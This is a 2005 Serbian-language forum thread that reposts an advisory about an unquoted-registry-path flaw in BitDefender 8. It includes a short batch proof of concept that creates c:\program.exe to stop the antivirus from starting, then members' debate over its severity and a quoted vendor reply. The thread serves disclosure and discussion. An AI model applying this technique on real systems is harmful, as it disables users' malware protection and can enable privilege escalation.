BitDefender exploit

1

BitDefender exploit

offline
  • Pridružio: 19 Mar 2005
  • Poruke: 146
  • Gde živiš: undernet.org

Date: 26 April 2005

Description:
A vulnerability in BitDefender has been reported, which can be exploited
by local users to disable the virus protection or gain escalated
privileges.

During installation, the installation process creates entries in the
"Run" registry key to automatically run some programs when a user logs
in. However, these entries are created insecurely and can be exploited
to prevent the virus protection from starting up or execute arbitrary
code with the privileges of another user logging in by placing a file
with a specially crafted name in the application path.

Successful exploitation requires that the application has been installed
in a non-default location with a directory name in the path containing a
white space character and that an unprivileged user can create a
specially named file in this path.


Solution:
There was no vendor-supplied solution at the time of entry.

The vendor recommends quoting the command line of the created entries in
the registry.



Product: BitDefender
Version: 8
Tested on: Windows 2000 SP4
Vulnerability: Race condition
-----------------------------

BACKGROUND
----------
BitDefender ensures the most advanced antivirus protection, as well as data
confidentiality, active content control and Internet filtering.
A powerful antivirus tool with features that best meet your security needs.
Source: bitdefender.com


VULNERABLE PRODUCTS
-------------------
BitDefender 8 Professional Plus
BitDefender 8 Standard Edition
Maybe other...


RACE CONDITION
--------------
At Windows startup, when a file named: program.exe is found on c:\
Windows send an alert message, messagebox controls are:
2 buttons -> "Rename" or "Ignore"
1 checkbox -> [X] Do not do this verification on startup.
(Sorry, haven't got the exact english message)

At this moment, BitDefender can't start, so we have a session without virus protection.


PROOF OF CONCEPT
----------------
Open your notepad.exe and paste this batch script.

@echo off
echo #-------------------------------------------------------#
echo [ SecuBox - Proof of Concept (04.12.2005) ]
echo #-------------------------------------------------------#
echo # This script just create the race condition. #
echo # It might be use by virus. #
echo # Now, reboot your computer and watch your BitDef ! #
echo #-------------------------------------------------------#
echo # Be carefull, for virus protection need another reboot #
echo # Closing your Windows session is not sufficient ! #
echo #-------------------------------------------------------#
echo BitDef PoC > c:\program.exe
pause
exit


EXPLOITATION
------------
Save this batch script as TEST.BAT and try it.


VENDOR STATUS
-------------
Vendor have been contacted but no reply ...

Dopuna: 30 Maj 2005 9:01

i sta sad ? niko nema sta da kaze na ovo ?



Registruj se da bi učestvovao u diskusiji. Registrovanim korisnicima se NE prikazuju reklame unutar poruka.
offline
  • leta 
  • BitDefender Distributer
  • Pridružio: 21 Mar 2005
  • Poruke: 481
  • Gde živiš: crayze land

black hat ::Date: 26 April 2005


Dopuna: 30 Maj 2005 9:01

i sta sad ? niko nema sta da kaze na ovo ?


Nema tu sta da se kaze, obrati se Microsoftu jer ovo skoro pa nema nikakve veze sa BD-om jer deo gde pise BitDef PoC je samo dodat nastavak (dali si ga ti dodao ili windows) jer BD nema oznaku nikakvu kao "BitDef PoC" nego samo BD...



offline
  • Peca  Male
  • Glavni Administrator
  • Predrag Damnjanović
  • SysAdmin i programer
  • Pridružio: 17 Apr 2003
  • Poruke: 23208
  • Gde živiš: Niš

koliko vidim, caka je u tome sto AV nije aktivan pri start-up-u windowsa dok ne izaberes Ignore/Rename, pa je fazon sto tada moze virus da onesposobi AV.
e sad, to vazi samo ako BD nije instaliran na default lokaciji, tako da je exploit bezveze...

offline
  • leta 
  • BitDefender Distributer
  • Pridružio: 21 Mar 2005
  • Poruke: 481
  • Gde živiš: crayze land

Peca ::koliko vidim, caka je u tome sto AV nije aktivan pri start-up-u windowsa dok ne izaberes Ignore/Rename, pa je fazon sto tada moze virus da onesposobi AV.
e sad, to vazi samo ako BD nije instaliran na default lokaciji, tako da je exploit bezveze...


A i uz to kad instaliras BD odmah ti ubaci u startup..nije mi jasno odakle je ovo iskopao al ajd... netreba nista da se klikce samo instaliras sve radi kako treba...

offline
  • Pridružio: 19 Mar 2005
  • Poruke: 146
  • Gde živiš: undernet.org

leta ::

A i uz to kad instaliras BD odmah ti ubaci u startup..nije mi jasno odakle je ovo iskopao al ajd... netreba nista da se klikce samo instaliras sve radi kako treba...


ti kazes da ovo nije nista posebno Smile ljudi iz firme koju ti zastupas kazu ovo:

Thanks for informing us about this issue. Now we are aware of it and in
short time all BitDefender installation kits will be updated in order
to fix it. The quick fix is to put all the start up commands between "
".

We will keep you posted.

--
Ovidiu Constantin - PGP/GPG Key ID 0xBF7F01FF
BitDefender Linux/Unices Testing Project Manager
SOFTWIN / Data Security Division / BitDefender
linux.bitdefender.com/


E, toliko o tvojoj komunikaciji sa njima, znaci ipak si samo sales man Smile
ocekivao sam malo profesionalniji odgovor od tebe,ali ... tu je peca da kaze da
je exploit bez veze Smile

offline
  • leta 
  • BitDefender Distributer
  • Pridružio: 21 Mar 2005
  • Poruke: 481
  • Gde živiš: crayze land

black hat ::--
Ovidiu Constantin - PGP/GPG Key ID 0xBF7F01FF
BitDefender Linux/Unices Testing Project Manager
SOFTWIN / Data Security Division / BitDefender
http://linux.bitdefender.com/



Peca je i bio u pravu a i nemesaj windows 2000 sa Xp-om kao i sto vidis I linux!!!

offline
  • ZoNi  Male
  • Free Your Mind!
  • Pridružio: 26 Feb 2005
  • Poruke: 5757
  • Gde živiš: Singidunum

uuu, leta... koliko slova "i" imas u svom postu Smile

offline
  • leta 
  • BitDefender Distributer
  • Pridružio: 21 Mar 2005
  • Poruke: 481
  • Gde živiš: crayze land

ZoNi ::uuu, leta... koliko slova "i" imas u svom postu Smile

sad sami ja primetila Smile

offline
  • Peca  Male
  • Glavni Administrator
  • Predrag Damnjanović
  • SysAdmin i programer
  • Pridružio: 17 Apr 2003
  • Poruke: 23208
  • Gde živiš: Niš

jel ovo propust samo prilikom instalacije, ili vazi za bilo koje startovanje windowsa?
ako je samo za prvo startovanje, posle instalacije, onda je exploit jos vise beskoristan.

plus, da bi radio exploit, moras da instaliras BD na ne-default lokaciju, koja, plus, u path-u ima blanko karakter.

ko ce, molim te, da exploatise ovo... posto je 'veliko pitanje' da li je BD na non-default lokaciji, sa blanko karakterom... plus sto niko ne pise virus specijalno za odredjen AV...
pa sto puta lakse je izabrati neki siguran nacin za 'ubijanje' antivirusa, kao sto to recimo trojanac TheBeast radi, koji smo testirali u nasem testu...

offline
  • Pridružio: 19 Mar 2005
  • Poruke: 146
  • Gde živiš: undernet.org

leta ::

Peca je i bio u pravu a i nemesaj windows 2000 sa Xp-om kao i sto vidis I linux!!!


cekaj,znaci hoces da mi kazes da "tvoj" kolega Ovidiu Constantin
se dzabe trudi ? posto ti i peca znate da je to bez veze exploit ? pa
sto mu bre onda najavite da se ne cima dzabe ?

I cekaj sad,uopste mi vise nije jasno,ta Vasa BitDefender co. je malkice
sludjena Linux Expert je odgovorio na winodws problem ?

ti mi sad kazes da nemesam windows2k/xp/linux ?

molio bih makar malo potpuniji odgvor od ZVANICNOG DISTRIBUTERA !

Dopuna: 31 Maj 2005 14:28

Peca ::jel ovo propust samo prilikom instalacije, ili vazi za bilo koje startovanje windowsa?
ako je samo za prvo startovanje, posle instalacije, onda je exploit jos vise beskoristan.



iskreno da ti kazem,za mene je exploit exploit znaci nema veze koliko je
PO TEBI ozbiljan ili ne.Kako KAV DISTRO i F-Secure odma objasne bilo
sta sto se pojavi u vezi njihovog soft ?

LETA nam nije dala nikakvo objasnjenje...osim tvoje izjave da je exploit bezveze...

Ko je trenutno na forumu
 

Ukupno su 889 korisnika na forumu :: 49 registrovanih, 10 sakrivenih i 830 gosta   ::   [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 3466 - dana 01 Jun 2021 17:07

Korisnici koji su trenutno na forumu:
Korisnici trenutno na forumu: A.R.Chafee.Jr., aleksmajstor, Apok, ArmyBoss, Bane san, dac, darkangel, dozorni, draganca, dragon986, Duško, goxsys, havoc995, Hoegaarden, HogarStrashni, ikan, ivica976, Jovan Nenad, kaisarevic1, Konda, kovinacc, krlebgd77, KUZMAR, Lucije Kvint, manda87, MarKhan, Marko Marković, mercedesamg, Mercury, mnn2, mushroom, nemkea71, neutralal.com, panonski mornar, Rakenica, Recce, rovac, Sićko, Srki94, Srle993, ssekir75, Steeeefan, theNedjeljko, Toni, Vlad000, vlvl, vranjanac29, wolverined4, |_MeD_|